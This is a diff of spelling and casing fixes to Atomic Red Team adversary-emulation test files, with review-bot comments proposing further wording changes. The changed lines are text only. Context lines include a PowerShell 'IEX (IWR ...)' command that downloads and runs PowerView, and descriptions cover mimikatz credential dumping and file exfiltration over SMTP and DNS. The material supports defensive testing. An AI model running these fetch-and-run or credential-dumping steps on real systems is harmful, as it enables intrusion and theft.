diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index f6ff35f9..27b1f4c2 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -183,7 +183,7 @@ atomic_tests:
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
- Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
+ Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
supported_platforms:
- windows
dependency_executor_name: command_prompt
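Review bot: The context line directly above the corrected sentence still reads "use the get_prereq_command's to meet the prerequisites", with a stray possessive apostrophe. Since this hunk already touches the description, change it to "use the get_prereq_command to meet the prerequisites" in the same commit.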
@@ -274,7 +274,7 @@ atomic_tests:
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
- Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
+ Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
supported_platforms:
- windows
input_arguments:
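Review bot: Quoting is inconsistent within this description: the corrected line wraps "ERROR kuhl_m_sekurlsa_acquireLSA" in plain double quotes, while the context line above it writes \"access denied\" with backslashes. If this text sits in a YAML block scalar, those backslashes are shown to the user literally, so drop them here so both error strings are quoted the same way.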
diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml
index f1342c9d..444a18e5 100644
--- a/atomics/T1003.006/T1003.006.yaml
+++ b/atomics/T1003.006/T1003.006.yaml
@@ -49,7 +49,7 @@ atomic_tests:
description: |
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
- [Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
+ [Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
supported_platforms:
- windows
diff --git a/atomics/T1014/T1014.yaml b/atomics/T1014/T1014.yaml
index c351454a..70710a4f 100644
--- a/atomics/T1014/T1014.yaml
+++ b/atomics/T1014/T1014.yaml
@@ -9,7 +9,7 @@ atomic_tests:
- linux
input_arguments:
rootkit_source_path:
- description: Path to the rootkit source. Used when prerequistes are fetched.
+ description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
@@ -51,7 +51,7 @@ atomic_tests:
- linux
input_arguments:
rootkit_source_path:
- description: Path to the rootkit source. Used when prerequistes are fetched.
+ description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_name:
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md
index 2277aab9..ce8b80ac 100644
--- a/atomics/T1016/T1016.md
+++ b/atomics/T1016/T1016.md
@@ -378,7 +378,7 @@ sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
## Atomic Test #9 - DNS Server Discovery Using nslookup
-Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
+Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by Qakbot malware to gather information on the domain
controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
**Supported Platforms:** Windows
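Review bot: This patch edits T1016.md without a matching T1016.yaml hunk, whereas T1018 is changed in both its .md and .yaml. If the Markdown is generated from the YAML, the "Qakbot" fix will be overwritten on the next regeneration, so make the change in T1016.yaml as well. The same sentence still has "System domain dns controller" and a bare "reference https://..." that could be tidied at the same time.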
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index 9cba7eb8..4b4fd3ff 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -748,7 +748,7 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/R
-## Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers
+## Atomic Test #19 - Get-WmiObject to Enumerate Domain Controllers
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
Upon successful execution a listing of Systems from AD will output with their paths.
Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index 74f7d336..1c591090 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -362,7 +362,7 @@ atomic_tests:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
name: powershell
-- name: Get-wmiobject to Enumerate Domain Controllers
+- name: Get-WmiObject to Enumerate Domain Controllers
auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
description: |
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
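Review bot: The name now uses the cmdlet's canonical casing, Get-WmiObject, but the first line of the description just below still says "utilize get-wmiobject". Use Get-WmiObject there too, and in the matching body line of T1018.md, so the heading and the text agree.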
diff --git a/atomics/T1027.004/T1027.004.yaml b/atomics/T1027.004/T1027.004.yaml
index 45edd715..6f68b6a9 100644
--- a/atomics/T1027.004/T1027.004.yaml
+++ b/atomics/T1027.004/T1027.004.yaml
@@ -37,7 +37,7 @@ atomic_tests:
description: |
When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
- The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
+ The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
supported_platforms:
- windows
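Review bot: The corrected sentence is still ungrammatical after the spelling fix: "is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder" has two main verbs. Suggest "The exe file that will be executed is named T1027.004_DynamicCompile.exe and is contained in the 'bin' folder of this atomic".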
diff --git a/atomics/T1027.006/T1027.006.yaml b/atomics/T1027.006/T1027.006.yaml
index 4c0ba870..2157a072 100644
--- a/atomics/T1027.006/T1027.006.yaml
+++ b/atomics/T1027.006/T1027.006.yaml
@@ -5,7 +5,7 @@ atomic_tests:
- name: HTML Smuggling Remote Payload
auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
description: |
- The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction.
+ The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction.
The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
supported_platforms:
- windows
diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
index ddd099b0..9dbd63c6 100644
--- a/atomics/T1027/T1027.yaml
+++ b/atomics/T1027/T1027.yaml
@@ -188,7 +188,7 @@ atomic_tests:
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
- description: Local path/filename to save the dowloaded file to
+ description: Local path/filename to save the downloaded file to
type: path
default: Atomic-license.txt
executor:
diff --git a/atomics/T1039/T1039.yaml b/atomics/T1039/T1039.yaml
index 637e633b..fcf668b4 100644
--- a/atomics/T1039/T1039.yaml
+++ b/atomics/T1039/T1039.yaml
@@ -1,7 +1,7 @@
attack_technique: T1039
display_name: Data from Network Shared Drive
atomic_tests:
-- name: Copy a sensitive File over Administive share with copy
+- name: Copy a sensitive File over Administrative share with copy
auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660
description: |-
Copy from sensitive File from the c$ of another LAN computer with copy cmd
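Review bot: The description under the renamed test still reads "Copy from sensitive File from the c$", with a doubled "from". Suggest "Copy a sensitive file from the c$ of another LAN computer with copy cmd"; the same wording appears in the Powershell variant further down.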
@@ -43,7 +43,7 @@ atomic_tests:
del %TEMP%\#{local_file}
name: command_prompt
elevation_required: true
-- name: Copy a sensitive File over Administive share with Powershell
+- name: Copy a sensitive File over Administrative share with Powershell
auto_generated_guid: 7762e120-5879-44ff-97f8-008b401b9a98
description: |-
Copy from sensitive File from the c$ of another LAN computer with powershell
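Review bot: Both T1039 hunks change the value of the name key rather than descriptive text. The auto_generated_guid values are untouched, so GUID-based references keep working, but anything that selects or reports these tests by name (saved test lists, detection validation mappings, generated indexes) will still carry the old "Administive" string. Worth calling out in the commit message so consumers know the names changed.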
diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml
index 85b9fb2c..9a26d547 100644
--- a/atomics/T1046/T1046.yaml
+++ b/atomics/T1046/T1046.yaml
@@ -24,7 +24,7 @@ atomic_tests:
description: |
Scan ports to check for listening ports with Nmap.
- Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
+ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- linux
- macos
@@ -167,7 +167,7 @@ atomic_tests:
fruit -noninteractive -consoleoutput
name: powershell
- name: Network Service Discovery for Containers
- auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
+ auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
supported_platforms:
- containers
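Review bot: The removed and added auto_generated_guid lines carry the same GUID, so this is a whitespace-only change in a commit that is otherwise spelling fixes. Please confirm whether it removes trailing whitespace or alters indentation; if it is indentation, check that the key still lines up with the sibling description and supported_platforms keys, since a misaligned key changes how the YAML parses.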
diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml
index 674f5001..ab4ac887 100644
--- a/atomics/T1047/T1047.yaml
+++ b/atomics/T1047/T1047.yaml
@@ -41,7 +41,7 @@ atomic_tests:
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable"
- if the provided remote host is unreacheable
+ if the provided remote host is unreachable
supported_platforms:
- windows
input_arguments:
diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml
index 8041baba..14c169df 100644
--- a/atomics/T1048.003/T1048.003.yaml
+++ b/atomics/T1048.003/T1048.003.yaml
@@ -92,7 +92,7 @@ atomic_tests:
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
description: |
Exfiltration of specified file over SMTP.
- Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
+ Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
supported_platforms:
- windows
executor:
diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml
index b4daf5ff..c918f282 100644
--- a/atomics/T1048/T1048.yaml
+++ b/atomics/T1048/T1048.yaml
@@ -52,7 +52,7 @@ atomic_tests:
- name: DNSExfiltration (doh)
auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
description: |
- DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
+ DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
!!! Test will fail without a domain under your control with A record and NS record !!!
See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
supported_platforms:
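Review bot: The corrected line still mixes verb forms: "allows for transferring (exfiltrate) a file" and, later in the same sentence, "allowing to exfiltrate data". Suggest "allows for transferring (exfiltrating) a file over a DNS request covert channel" and "a data leak testing tool that allows exfiltrating data over a covert channel".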